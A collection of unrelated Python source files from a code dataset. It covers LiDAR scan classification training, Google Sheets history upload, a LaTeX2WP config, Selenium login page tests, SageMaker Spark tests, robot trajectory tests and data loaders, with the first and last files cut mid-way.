trans_x, trans_y = np.random.uniform(low=-self.translation_scale, high=self.translation_scale, size=2)
# new scan
angles = np.linspace(-SCAN_RANGE / 2, SCAN_RANGE / 2, len(scan))
x = np.cos(angles) * scan
y = np.sin(angles) * scan
x -= trans_x
y -= trans_y
new_angles = np.arctan2(y, x)
new_scan = []
for angle_i in angles:
scan_len = []
for j in range(len(new_angles) - 1):
new_angle_j = new_angles[j]
new_angle_jp1 = new_angles[j + 1]
if (new_angle_j - angle_i) * (new_angle_jp1 - angle_i) > 0:
# no intersection
continue
x_j, y_j = x[j], y[j]
x_jp1, y_jp1 = x[j + 1], y[j + 1]
if (new_angle_j - angle_i) * (new_angle_jp1 - angle_i) < 0:
# exists intersection, find out where it is
if np.sqrt((x_j - x_jp1) ** 2 + (y_j - y_jp1) ** 2) < 0.5:
# two points are close, they are on the same object
inter_x, inter_y = find_intersect(x_j, y_j, x_jp1, y_jp1, angle_i)
else:
# two are far away from each other, on the different object
if (x_j ** 2 + y_j ** 2) > (x_jp1 ** 2 + y_jp1 ** 2):
if j > 0:
inter_x, inter_y = find_intersect(x_j, y_j, x[j - 1], y[j - 1], angle_i)
else:
inter_x, inter_y = x_j, y_j
else:
if j < len(new_angles) - 2:
inter_x, inter_y = find_intersect(x_jp1, y_jp1, x[j + 2], y[j + 2], angle_i)
else:
inter_x, inter_y = x_jp1, y_jp1
scan_len.append(np.sqrt(inter_x ** 2 + inter_y ** 2))
else:
if new_angle_j == angle_i:
scan_len.append(np.sqrt(x_j ** 2 + y_j ** 2))
else:
scan_len.append(np.sqrt(x_j ** 2 + y_j ** 2))
if len(scan_len):
new_scan.append(np.min(scan_len))
else:
# no intersection found
angle_diff = np.abs(new_angles - angle_i)
idx1, idx2 = np.argsort(angle_diff)[:2]
inter_x, inter_y = find_intersect(x[idx1], y[idx1], x[idx2], y[idx2], angle_i)
new_scan.append(np.sqrt(inter_x ** 2 + inter_y ** 2))
new_scans.append(new_scan)
# new gp
new_gp = gp - np.array([trans_x, trans_y])
new_gp[:4] += np.linspace(1, 0, 5, endpoint=False)[1:, np.newaxis] * np.array([trans_x, trans_y])
new_gps.append(new_gp)
return np.array(new_scans), np.array(new_gps)
def train(self, X_train, y_train, X_test, y_test):
if not self.mode_inited:
self._init_model()
self.mode_inited = True
scan_train, gp_train = X_train
scan_test, gp_test = X_test
if self.translation:
with open("translation_aug.pkl", "rb") as f:
d = pickle.load(f)
(scan_aug_train_full, gp_aug_train_full), y_aug_train_full = d['X_train'], d['y_train']
(scan_aug_test_full, gp_aug_test_full), y_aug_test_full = d['X_test'], d['y_test']
full_contexts = ["curve", "open_space", "U_turn", "narrow_entrance", "narrow_corridor",
"normal_1", "normal_2"]
scan_aug_train, gp_aug_train, y_aug_train = [], [], []
scan_aug_test, gp_aug_test, y_aug_test = [], [], []
for y, ctx in enumerate(self.used_context):
y_label = full_contexts.index(ctx)
scan_aug_train.extend(scan_aug_train_full[y_aug_train_full == y_label])
gp_aug_train.extend(gp_aug_train_full[y_aug_train_full == y_label])
y_aug_train.extend([y] * np.sum(y_aug_train_full == y_label))
scan_aug_test.extend(scan_aug_test_full[y_aug_test_full == y_label])
gp_aug_test.extend(gp_aug_test_full[y_aug_test_full == y_label])
y_aug_test.extend([y] * np.sum(y_aug_test_full == y_label))
scans, gps, ys = shuffle(np.concatenate([scan_aug_train, scan_aug_test]),
np.concatenate([gp_aug_train, gp_aug_test]),
np.concatenate([y_aug_train, y_aug_test]))
num_train = int(len(scans) * 0.8)
scan_aug_train, gp_aug_train, y_aug_train = scans[:num_train], gps[:num_train], ys[:num_train]
scan_aug_test, gp_aug_test, y_aug_test = scans[num_train:], gps[num_train:], ys[num_train:]
if self.full_train:
scan_train = np.concatenate([scan_train, scan_aug_train, scan_aug_test], axis=0)
gp_train = np.concatenate([gp_train, gp_aug_train, gp_aug_test], axis=0)
y_train = np.concatenate([y_train, y_aug_train, y_aug_test], axis=0)
else:
scan_train = np.concatenate([scan_train, scan_aug_train], axis=0)
gp_train = np.concatenate([gp_train, gp_aug_train], axis=0)
y_train = np.concatenate([y_train, y_aug_train], axis=0)
scan_test = np.concatenate([scan_test, scan_aug_test], axis=0)
gp_test = np.concatenate([gp_test, gp_aug_test], axis=0)
y_test = np.concatenate([y_test, y_aug_test], axis=0)
labels, counts = np.unique(y_train, return_counts=True)
weights = counts / counts.sum() * len(counts)
weights = dict(zip(*[labels, weights]))
sess = self.sess
self.writer.add_graph(sess.graph)
for i in range(self.epochs):
train_acc, train_loss, test_acc, test_loss = [], [], [], []
train_confs = []
scan_train, gp_train, y_train = shuffle(scan_train, gp_train, y_train)
for j in range(len(scan_train) // self.batch_size + 1):
batch_scan = scan_train[j:j + self.batch_size]
batch_gp = gp_train[j:j + self.batch_size]
batch_y = y_train[j:j + self.batch_size]
batch_w = np.array([weights[y] for y in batch_y])
batch_scan, batch_gp, batch_valid = self._data_augment(batch_scan, batch_gp, training=True)
batch_scan, batch_gp, batch_y, batch_w = \
batch_scan[batch_valid], batch_gp[batch_valid], batch_y[batch_valid], batch_w[batch_valid]
loss, acc, _ = sess.run([self.loss, self.acc, self.train_op],
feed_dict={self.scan_ph: batch_scan,
self.gp_ph: batch_gp,
self.label_ph: batch_y,
self.weight_ph: batch_w,
self.annealing_step_ph: 1 * (len(X_train) // self.batch_size + 1),
self.dropout_rate_ph: self.dropout_rate})
if self.use_EDL:
conf = sess.run(self.confidence,
feed_dict={self.scan_ph: batch_scan,
self.gp_ph: batch_gp,
self.label_ph: batch_y,
self.annealing_step_ph: 1 * (len(X_train) // self.batch_size + 1),
self.dropout_rate_ph: 0.0})
train_confs.extend(conf)
train_loss.extend([loss] * self.batch_size)
train_acc.extend([acc] * self.batch_size)
test_pred = []
test_confs = []
for j in range(0, len(scan_test), self.batch_size):
batch_scan = scan_test[j:j + self.batch_size]
batch_gp = gp_test[j:j + self.batch_size]
batch_y = y_test[j:j + self.batch_size]
batch_w = np.array([weights[y] for y in batch_y])
batch_scan, batch_gp, batch_valid = self._data_augment(batch_scan, batch_gp, training=False)
# batch_scan, batch_gp, batch_y = batch_scan[batch_valid], batch_gp[batch_valid], batch_y[batch_valid]
pred, loss, acc = sess.run([self.pred, self.loss, self.acc],
feed_dict={self.scan_ph: batch_scan,
self.gp_ph: batch_gp,
self.label_ph: batch_y,
self.weight_ph: batch_w,
self.annealing_step_ph: 2 ** 31 - 1,
self.dropout_rate_ph: 0.0})
if self.use_EDL:
conf = sess.run(self.confidence, feed_dict={self.scan_ph: batch_scan,
self.gp_ph: batch_gp,
self.label_ph: batch_y,
self.annealing_step_ph: 2 ** 31 - 1,
self.dropout_rate_ph: 0.0})
test_confs.extend(conf)
test_loss.extend([loss] * len(batch_scan))
test_acc.extend([acc] * len(batch_scan))
test_pred.extend(pred)
test_pred = np.array(test_pred)
test_confs = np.array(test_confs)
train_acc, train_loss = np.mean(train_acc), np.mean(train_loss)
test_acc, test_loss = np.mean(test_acc), np.mean(test_loss)
summary = tf.Summary(value=[tf.Summary.Value(tag="train/loss", simple_value=train_loss),
tf.Summary.Value(tag="train/acc", simple_value=train_acc),
tf.Summary.Value(tag="test/loss", simple_value=test_loss),
tf.Summary.Value(tag="test/acc", simple_value=test_acc)])
self.writer.add_summary(summary, i)
if self.use_EDL:
summary = tf.Summary(value=[tf.Summary.Value(tag="train/conf", simple_value=np.mean(train_confs)),
tf.Summary.Value(tag="test/conf", simple_value=np.mean(test_confs))])
self.writer.add_summary(summary, i)
summary_val = []
for j in range(self.Dy):
acc = np.mean(y_test[y_test == j] == test_pred[y_test == j])
summary_val.append(tf.Summary.Value(tag="test_acc/{}".format(j), simple_value=acc))
if self.use_EDL:
conf = np.mean(test_confs[y_test == j])
summary_val.append(tf.Summary.Value(tag="test_conf/{}".format(j), simple_value=conf))
self.writer.add_summary(tf.Summary(value=summary_val), i)
if (i + 1) % 10 == 0:
self._save_model(epoch_num=i + 1)
def predict(self, scan, gp):
in_batch = len(scan.shape) > 1
if not in_batch:
scan, gp = np.array([scan]), np.array([gp])
scan, gp, valid = self._data_augment(scan, gp, training=False)
if self.use_EDL:
pred, confidence = self.sess.run([self.pred, self.confidence], feed_dict={self.scan_ph: scan,
self.gp_ph: gp,
self.dropout_rate_ph: 0.0})
confidence[np.logical_not(valid)] = 0.0
if not in_batch:
pred, confidence = pred[0], confidence[0]
return pred, confidence
else:
pred = self.sess.run(self.pred, feed_dict={self.scan_ph: scan, self.gp_ph: gp, self.dropout_rate_ph: 0.0})
if not in_batch:
pred = pred[0]
return pred
def main():
args = make_args()
X_train, y_train, X_test, y_test = get_dataset(args, draw_data=False)
model = ScanClassifier(args)
model.train(X_train, y_train, X_test, y_test)
# model._load_model("../rslts/2020-10-14-15-21-06/models/model_500.pickle")
# print(np.unique(model.predict(X_test[0][y_test == 4], X_test[1][y_test == 4])[0], return_counts=True))
# print(np.unique(model.predict(X_train[0][y_train == 4], X_train[1][y_train == 4])[0], return_counts=True))
# print(np.unique(model.predict(X_test[0][y_test == 5], X_test[1][y_test == 5])[0], return_counts=True))
# print(np.unique(model.predict(X_train[0][y_train == 5], X_train[1][y_train == 5])[0], return_counts=True))
if __name__ == "__main__":
main()
| StarcoderdataPython |
1695024 | <filename>filipkin.com/history.py<gh_stars>1-10
#!/usr/bin/env python
import json
from pprint import pprint
import sys
import gspread
from oauth2client.service_account import ServiceAccountCredentials
json = json.load(open('history.json'))
scope = [
'https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive'
]
creds = ServiceAccountCredentials.from_json_keyfile_name(
'client-id.json', scope)
gc = gspread.authorize(creds)
sid = sys.argv[1]
sheets = gc.list_spreadsheet_files()
sheetfound = False
for i in sheets:
if i['id'] == sid:
sheetfound = True
break
if sheetfound == True:
ws = gc.open_by_key(sid).sheet1
ws.resize(len(json)+1, 5)
cells = ws.range("A2:E"+str(len(json)+1))
i = 0
for x in json:
cells[i].value = (str(''))[:49999]
i = i + 1
cells[i].value = (str(x['time']))[:49999]
i = i + 1
cells[i].value = (str(x['title']))[:49999]
i = i + 1
cells[i].value = (str(x['url']))[:49999]
i = i + 1
cells[i].value = (str(x['id']))[:49999]
i = i + 1
ws.update_cells(cells)
| StarcoderdataPython |
1694734 | """
Copyright 2009 <NAME>
Additional contributors: <NAME>
LaTeX2WP version 0.6.2
This file is part of LaTeX2WP, a program that converts
a LaTeX document into a format that is ready to be
copied and pasted into WordPress.
You are free to redistribute and/or modify LaTeX2WP under the
terms of the GNU General Public License (GPL), version 3
or (at your option) any later version.
I hope you will find LaTeX2WP useful, but be advised that
it comes WITHOUT ANY WARRANTY; without even the implied warranty
of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GPL for more details.
You should have received a copy of the GNU General Public
License along with LaTeX2WP. If you can't find it,
see <http://www.gnu.org/licenses/>.
"""
# Lines starting with #, like this one, are comments
# change to HTML = True to produce standard HTML
HTML = False
# color of LaTeX formulas
textcolor = "000000"
# colors that can be used in the text
colors = { "red" : "ff0000" , "green" : "00ff00" , "blue" : "0000ff" }
# list of colors defined above
colorchoice = ["red","green","blue"]
# counters for theorem-like environments
# assign any counter to any environment. Make sure that
# maxcounter is an upper bound to the any counter being used
T = { "theorem" : 0 , "lemma" : 0 , "proposition" : 0, "definition" : 0,
"corollary" : 0, "remark" : 0 , "example" : 0, "claim" : 0,
"exercise" : 0,
"axiom" : 1, "problem" : 2, "ques" : 0, # Napkin
"sproblem" : 2, "dproblem" : 2
}
# list of theorem-like environments
ThmEnvs = T.keys()
# the way \begin{theorem}, \begin{lemma} etc are translated in HTML
# the string _ThmType_ stands for the type of theorem
# the string _ThmNumb_ is the theorem number
box_string = "<div style=\"color: #000000 !important; border: 1px red solid;" + \
"padding-left: 8px; padding-top: 4px; margin-bottom: 8px !important; \">"
head_string = "<p style=\"margin-bottom: 6px\"><b style=\"color: #ff4d4d !important;\">"
beginthm = "\n" + box_string + head_string + "_ThmType_ _ThmNumb_" + "</b></p>"
# translation of \begin{theorem}[...]. The string
# _ThmName_ stands for the content betwee the
# square brackets
beginnamedthm = "\n" + box_string + head_string + "_ThmType_ _ThmNumb_" + "</b>" + " <b>(_ThmName_)</b>" + "</p>"
#translation of \end{theorem}, \end{lemma}, etc.
endthm = "<p style=\"margin-bottom:-12px;\"></p></div>\n"
beginproof = "<em>Proof:</em> "
endproof = "$latex \Box&fg=000000$\n"
beginquote = "<blockquote>\n"
endquote = "</blockquote>\n"
section = "\n<h2>_SecNumb_. _SecName_ </h2>\n"
sectionstar = "\n<h2>_SecName_</h2>\n"
subsection = "\n<h3>_SecNumb_._SubSecNumb_. _SecName_ </h3>\n"
subsectionstar = "\n<h3> _SecName_ </h3>\n"
# Font styles. Feel free to add others. The key *must* contain
# an open curly bracket. The value is the namem of a HTML tag.
fontstyle = {
r'{\em ' : 'em',
r'{\bf ' : 'b',
r'{\it ' : 'i',
r'{\sl ' : 'i',
r'\textit{' : 'i',
r'\textsl{' : 'i',
r'\emph{' : 'em',
r'\textbf{' : 'b',
r'\vocab{' : 'b',
}
# Macro definitions
# It is a sequence of pairs [string1,string2], and
# latex2wp will replace each occurrence of string1 with an
# occurrence of string2. The substitutions are performed
# in the same order as the pairs appear below.
# Feel free to add your own.
# Note that you have to write \\ instead of \
# and \" instead of "
M = [
[r"\ii", r"\item"] ,
[r"\to", r"\rightarrow"] ,
[r"\NN", r"{\mathbb N}"],
[r"\ZZ", r"{\mathbb Z}"],
[r"\CC", r"{\mathbb C}"],
[r"\RR", r"{\mathbb R}"],
[r"\QQ", r"{\mathbb Q}"],
[r"\FF", r"{\mathbb F}"],
[r"\OO", r"{\mathcal O}"],
[r"\pp", r"{\mathfrak p}"],
[r"\qq", r"{\mathfrak q}"],
[r"\Norm", r"\text{N}"],
[r"\End", r"\text{End}"],
[r"\xor", r"\oplus"],
[r"\eps", r"\epsilon"],
[r"\dg", r"^{\circ}"],
[r"\ol", r"\overline"],
[r"\inv", r"^{-1}"],
[r"\half", r"\frac{1}{2}"],
[r"\defeq", r"\overset{\text{def}}{=}"],
[r"\id", r"\mathrm{id}"],
[r"\qedhere", r""], # sigh
[r"\injto", r"\hookrightarrow"],
[r"\img", r"\text{Im }"], # :(
]
| StarcoderdataPython |
1700699 | <filename>M3_feature_zone/retipyserver/test/test_vessel_classification_endpoint.py
# Retipy - Retinal Image Processing on Python
# Copyright (C) 2017 <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""tests for vessel classification endpoint module"""
import json
import sys
from retipy.retina import Retina
from retipy.server import app
from unittest import TestCase
class TestVesselClassificationEndpoint(TestCase):
_resources = 'retipy/resources/images/'
def setUp(self):
self.segmented_image = Retina(None, self._resources + 'manual.png').original_base64
self.original_image = Retina(None, self._resources + 'original.tif').original_base64
self.app = app.test_client()
def test_classification_no_success(self):
response = self.app.post("/retipy/vessel_classification/classification")
self.assertEqual(json.loads(response.get_data().decode(sys.getdefaultencoding())), {'success': False})
| StarcoderdataPython |
4837063 | #!/usr/bin/env python
from ete3 import NCBITaxa
from argparse import ArgumentParser
import os
import pandas as pd
import sys
import re
v_re = re.compile("[0-9].[0-9]")
def main():
parser = ArgumentParser()
parser.add_argument("namesmap", help="File with ids->names mappings")
parser.add_argument("-t", "--taxdb", help="Taxonomy database formatted using ete3")
args = parser.parse_args()
if not os.path.exists(args.taxdb):
with open(args.taxdb, 'w') as fh:
pass
ncbi_taxa = NCBITaxa(args.taxdb)
# Read names
lineages = {}
ids = {}
ranks = ["superkingdom","phylum","class","order","family","genus","species"]
with open(args.namesmap, 'r') as fhin:
for line in fhin:
line = line.rstrip()
genome_id, name = line.split("\t")
ids[genome_id] = name
for genome_id, name in ids.items():
lineages[genome_id] = {}
for rank in ranks:
lineages[genome_id][rank] = ""
items = name.split(" ")
taxid = False
for i in range(2,len(items)+1):
query_name = " ".join(items[0:i])
name2taxid = ncbi_taxa.get_name_translator([query_name])
try:
taxid = name2taxid[query_name][0]
break
except KeyError:
continue
if not taxid:
sys.stderr.write("No information found for:{}\n".format(genome_id))
continue
lineage = ncbi_taxa.get_lineage(taxid)
rankdict = ncbi_taxa.get_rank(lineage)
for taxid,rank in rankdict.items():
if rank in ranks:
rank_name = ncbi_taxa.get_taxid_translator([taxid])[taxid]
lineages[genome_id][rank] = rank_name
df = pd.DataFrame(lineages).T
df = df.loc[:,ranks]
df.index.name="genome_id"
df.to_csv(sys.stdout, sep="\t")
if __name__ == '__main__':
main()
| StarcoderdataPython |
160378 | <filename>src/tests/test_trajectory.py
import pytest
from unittest.mock import MagicMock
from data_logger import DataLogger
from commands.trajectories import CsvTrajectoryCommand, StateSpaceDriveCommand
from robot import Rockslide
log_trajectory = True
def test_CsvTrajectoryCommand(Notifier, sim_hooks):
robot = Rockslide()
robot.robotInit()
command = CsvTrajectoryCommand("traj1.tra")
command.initialize()
assert len(command.trajectory_points) != 0
i = 0
t = 0
while not command.isFinished():
command.execute()
i += 1
t += robot.getPeriod()
sim_hooks.time = t
assert t < 10
command.end()
command.logger.close()
def test_CsvTrajectoryCommand(Notifier):
robot = Rockslide()
robot.robotInit()
command = CsvTrajectoryCommand("traj1.tra")
command.initialize()
command.trajectory_points = [(0,0,0,4,-4, 2, -2,0)]
command.execute()
v = 4 * robot.drivetrain.ratio / 0.3048 / 10
a = 2 * robot.drivetrain.ratio / 0.3048 / 10
assert command.target_v_l == v
assert command.target_v_r == -v
assert command.target_a_l == a
assert command.target_a_r == -a
class DriveSide:
def __init__(self, Ks, Kv, Ka, invert=False):
s = self
s.Ks, s.Kv, s.Ka, s.invert = Ks, Kv, Ka, invert
print("Ks: %f" % Ks)
print("Kv: %f" % Kv)
print("Ka: %f" % Ka)
self.v_mps = 0
self.a_mps2 = 0
self.pos_m = 0
def update(self, voltage, dt_s):
if self.invert:
voltage = -voltage
Ks = self.Ks
if voltage < 0: Ks = -Ks
self.pos_m += self.v_mps * dt_s
self.v_mps += self.a_mps2 * dt_s
self.a_mps2 = (voltage - Ks - self.v_mps * self.Kv) / self.Ka
def test_DriveSide():
ds = DriveSide(Ks=1, Kv=2, Ka=3)
ds.update(10, 0.02)
assert ds.a_mps2 == pytest.approx(3.0, 0.01)
assert ds.v_mps == pytest.approx(0.0, 0.01)
ds.update(10, 0.02)
assert ds.a_mps2 == pytest.approx(2.96, 0.01)
assert ds.v_mps == pytest.approx(0.06, 0.01)
ds.update(-10, 0.02)
assert ds.a_mps2 == pytest.approx(-3.08, 0.01)
assert ds.v_mps == pytest.approx(0.1192, 0.01)
ds.update(-10, 0.02)
assert ds.a_mps2 == pytest.approx(-3.04, 0.01)
assert ds.v_mps == pytest.approx(0.0576, 0.01)
ds.update(-10, 0.02)
assert ds.a_mps2 == pytest.approx(-2.99, 0.01)
assert ds.v_mps == pytest.approx(-0.00315, 0.01)
def test_DriveSide2():
ds = DriveSide(Ks=1, Kv=2, Ka=3, invert=True)
ds.update(10, 0.02)
assert ds.pos_m == pytest.approx(0, 0.01)
ds.update(10, 0.02)
assert ds.pos_m == pytest.approx(0, 0.01)
ds.update(10, 0.02)
assert ds.pos_m == pytest.approx(-0.0012, 0.01)
ds.update(10, 0.02)
assert ds.pos_m == pytest.approx(-0.00358, 0.01)
def test_StateSpaceDriveCommand(Notifier):
global log_trajectory
left_drive = DriveSide(
Ks=1.293985,
Kv=0.014172 * 63. / 0.3048,
Ka=0.005938 * 63. / 0.3048)
right_drive = DriveSide(
Ks=1.320812,
Kv=0.013736 * 63. / 0.3048,
Ka=0.005938 * 63. / 0.3048)
robot = Rockslide()
robot.robotInit()
robot.drivetrain.getLeftEncoder = getLeftEncoder = MagicMock()
robot.drivetrain.getRightEncoder = getRightEncoder = MagicMock()
robot.drivetrain.getVoltage = MagicMock(return_value=10)
command = StateSpaceDriveCommand("straight3m.tra")
command.initialize()
dt = robot.getPeriod()
t = 0
if log_trajectory:
logger = DataLogger("test_StateSpaceDriveCommand.csv")
logger.log_while_disabled = True
logger.do_print = False
logger.add('t', lambda: t)
logger.add('pos_l_m', lambda: left_drive.pos_m)
logger.add('pos_r_m', lambda: right_drive.pos_m)
logger.add('m_pos_l_m', lambda: command.y[0,0])
logger.add('m_pos_r_m', lambda: command.y[1,0])
logger.add('vel_l_mps', lambda: left_drive.v_mps)
logger.add('vel_r_mps', lambda: right_drive.v_mps)
logger.add('target_pos_l_m', lambda: command.r[0,0])
logger.add('target_pos_r_m', lambda: command.r[2,0])
logger.add('target_vel_l_mps', lambda: command.r[1,0])
logger.add('target_vel_r_mps', lambda: command.r[3,0])
logger.add('voltage', lambda: command.drivetrain.getVoltage())
logger.add('vpl', lambda: command.drivetrain.motor_lb.get())
logger.add('vpr', lambda: command.drivetrain.motor_rb.get())
while not command.isFinished():
logger.log()
getLeftEncoder.return_value = left_drive.pos_m * 630 / 0.3048
getRightEncoder.return_value = right_drive.pos_m * 630 / 0.3048
command.execute()
V = command.drivetrain.getVoltage()
vpl = command.drivetrain.motor_lb.get()
vpr = command.drivetrain.motor_rb.get()
left_drive.update(V * vpl, dt)
right_drive.update(V * vpr, dt)
t += dt
assert t < 10
command.end()
| StarcoderdataPython |
1757007 | <filename>flaskapp/config/debug.py
ENV = 'debug'
DEBUG = True
HOST = False
PORT = 5000 | StarcoderdataPython |
137673 | import os
import sys
import mxnet as mx
def cifar100_iterator(cfg, kv):
train_rec = os.path.join(cfg.dataset.data_dir, "cifar100_train.rec")
val_rec = os.path.join(cfg.dataset.data_dir, "cifar100_test.rec")
mean = [129.31, 124.11, 112.4]
std = [68.21, 65.41, 70.41]
train = mx.io.ImageRecordIter(
path_imgrec = train_rec,
label_width = 1,
data_name = 'data',
label_name = 'softmax_label',
data_shape = (3, 32, 32),
batch_size = cfg.batch_size,
pad = 4,
fill_value = 127,
#mean_r = mean[0],
#mean_g = mean[1],
#mean_b = mean[2],
#std_r = std[0],
#std_g = std[1],
#std_b = std[2],
rand_crop = True if cfg.dataset.aug_level > 0 else False,
rand_mirror = True if cfg.dataset.aug_level > 0 else False,
shuffle = True if cfg.dataset.aug_level >= 0 else False,
num_parts = kv.num_workers,
part_index = kv.rank)
val = mx.io.ImageRecordIter(
path_imgrec = val_rec,
label_width = 1,
data_name = 'data',
label_name = 'softmax_label',
batch_size = cfg.batch_size,
data_shape = (3, 32, 32),
mean_r = mean[0],
#mean_g = mean[1],
#mean_b = mean[2],
#std_r = std[0],
#std_g = std[1],
#std_b = std[2],
rand_crop = False,
rand_mirror = False,
num_parts = kv.num_workers,
part_index = kv.rank)
return train, val
| StarcoderdataPython |
1764533 | import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from selenium import webdriver
from selenium.webdriver import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from locators.locators import LoginPageLocators
from locators.locators import RegisterPageLocators
from .base_page import BasePage
class Login(BasePage):
def open_login_page_url(self):
url = "https://www.amazon.com/ap/signin?_encoding=UTF8&openid.assoc_handle=usflex&openid."\
"claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs."\
"openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2."\
"0&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2F"\
"www.amazon.com%2Fgp%2Fcss%2Fhomepage.html%3Fie%3DUTF8%26%252AVersion%252A%3D1%26%252Aentries%252A%3D0"
self.driver.get(url)
def open_login_page_main(self):
url = "https://www.amazon.com/"
self.driver.get(url)
menu = self.wait_for_element(RegisterPageLocators.DROP_MENU) #The same locator
login = self.wait_for_element(LoginPageLocators.SIGN_IN)
action = ActionChains(self.driver)
action.move_to_element(menu).move_to_element(login).click().perform()
def print_title(self):
print(self.driver.title)
def is_title_matches(self):
return "Amazon Sign-In" in self.driver.title
def click_cont_button(self):
self.wait_to_be_clickable(LoginPageLocators.CONTINUE_BUTTON).click()
def click_need_help_link(self):
self.wait_to_be_clickable(LoginPageLocators.NEED_HELP_LINK).click()
def click_forgot_pass_link(self):
self.wait_to_be_clickable(LoginPageLocators.FORGOT_PASS_LINK).click()
def click_other_issues_link(self):
self.wait_to_be_clickable(LoginPageLocators.OTHER_ISSUES_LINK).click()
def click_create_acc_buttom(self):
self.wait_to_be_clickable(LoginPageLocators.CREATE_ACC_BUTTON).click()
def empty_alert(self):
text = "Enter your email or mobile phone number"
return text in self.wait_for_element(LoginPageLocators.EMPTY_EMAIL_PHONE).text
def email_alert(self):
text = "We cannot find an account with that email address"
return text in self.wait_for_element(LoginPageLocators.EMAIL_PHONE_ALERT).text
def phone_alert(self):
text = "We cannot find an account with that mobile number"
return text in self.wait_for_element(LoginPageLocators.EMAIL_PHONE_ALERT).text
def set_email_phone_input(self, text):
self.wait_for_element(LoginPageLocators.EMAIL_PHONE_INPUT).click()
self.wait_for_element(LoginPageLocators.EMAIL_PHONE_INPUT).send_keys(text)
def click_forgot_password_link(self):
self.wait_for_element(LoginPageLocators.NEED_HELP_LINK).click()
self.wait_for_element(LoginPageLocators.FORGOT_PASS_LINK).click()
def click_other_issues_link(self):
self.wait_for_element(LoginPageLocators.NEED_HELP_LINK).click()
self.wait_for_element(LoginPageLocators.OTHER_ISSUES_LINK).click()
def check_valid_email(self, text):
return text in self.wait_for_element(LoginPageLocators.VALID_EMAIL).text
def check_forgot_password_site(self):
text = "Password assistance"
return text in self.wait_for_element(LoginPageLocators.FORGOT_PASS_SITE).text
def check_other_issues_site(self):
text = "Account & Login Issues"
return text in self.wait_for_element(LoginPageLocators.OTHER_ISSUES_SITE).text
def check_create_acc_site(self):
text = "Create account"
return text in self.wait_for_element(LoginPageLocators.CREATE_ACC_SITE).text
| StarcoderdataPython |
1635228 | <filename>sagemaker-pyspark-sdk/tests/sagemakerestimator_test.py
# Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import os
import pytest
from pyspark import SparkConf, SparkContext
from sagemaker_pyspark import (classpath_jars, SageMakerEstimator)
from sagemaker_pyspark.transformation.deserializers import KMeansProtobufResponseRowDeserializer
from sagemaker_pyspark.transformation.serializers import ProtobufRequestRowSerializer
@pytest.fixture(autouse=True)
def with_spark_context():
os.environ['SPARK_CLASSPATH'] = ":".join(classpath_jars())
conf = (SparkConf()
.set("spark.driver.extraClassPath", os.environ['SPARK_CLASSPATH']))
if SparkContext._active_spark_context is None:
SparkContext(conf=conf)
yield SparkContext._active_spark_context
# TearDown
SparkContext.stop(SparkContext._active_spark_context)
def test_sagemakerestimator_passes_correct_params_to_scala():
training_image = "train-abc-123"
model_image = "model-abc-123"
training_instance_count = 2
training_instance_type = "train-abc-123"
endpoint_instance_type = "c4.8xlarge"
endpoint_initial_instance_count = 2
estimator = SageMakerEstimator(
trainingImage=training_image,
modelImage=model_image,
trainingInstanceCount=training_instance_count,
trainingInstanceType=training_instance_type,
endpointInstanceType=endpoint_instance_type,
endpointInitialInstanceCount=endpoint_initial_instance_count,
requestRowSerializer=ProtobufRequestRowSerializer(),
responseRowDeserializer=KMeansProtobufResponseRowDeserializer()
)
assert estimator.trainingImage == training_image
assert estimator.modelImage == model_image
assert estimator.trainingInstanceType == training_instance_type
assert estimator.trainingInstanceCount == training_instance_count
assert estimator.endpointInitialInstanceCount == endpoint_initial_instance_count
assert estimator.endpointInstanceType == endpoint_instance_type
def test_sagemakerestimator_default_params():
training_image = "train-abc-123"
model_image = "model-abc-123"
training_instance_count = 2
training_instance_type = "train-abc-123"
endpoint_instance_type = "endpoint-abc-123"
endpoint_initial_instance_count = 2
estimator = SageMakerEstimator(
trainingImage=training_image,
modelImage=model_image,
trainingInstanceCount=training_instance_count,
trainingInstanceType=training_instance_type,
endpointInstanceType=endpoint_instance_type,
endpointInitialInstanceCount=endpoint_initial_instance_count,
requestRowSerializer=ProtobufRequestRowSerializer(),
responseRowDeserializer=KMeansProtobufResponseRowDeserializer()
)
assert estimator.trainingInstanceVolumeSizeInGB == 1024
assert estimator.trainingProjectedColumns is None
assert estimator.trainingChannelName == "train"
assert estimator.trainingContentType is None
assert estimator.trainingS3DataDistribution == "ShardedByS3Key"
assert estimator.trainingSparkDataFormat == "sagemaker"
assert estimator.trainingInputMode == "File"
assert estimator.trainingCompressionCodec is None
assert estimator.trainingMaxRuntimeInSeconds == 24 * 60 * 60
assert estimator.trainingKmsKeyId is None
assert estimator.modelPrependInputRowsToTransformationRows is True
assert estimator.deleteStagingDataAfterTraining is True
| StarcoderdataPython |
12122 | import json
import argparse
from argus.callbacks import MonitorCheckpoint, \
EarlyStopping, LoggingToFile, ReduceLROnPlateau
from torch.utils.data import DataLoader
from src.datasets import FreesoundDataset, FreesoundNoisyDataset, RandomDataset
from src.datasets import get_corrected_noisy_data, FreesoundCorrectedNoisyDataset
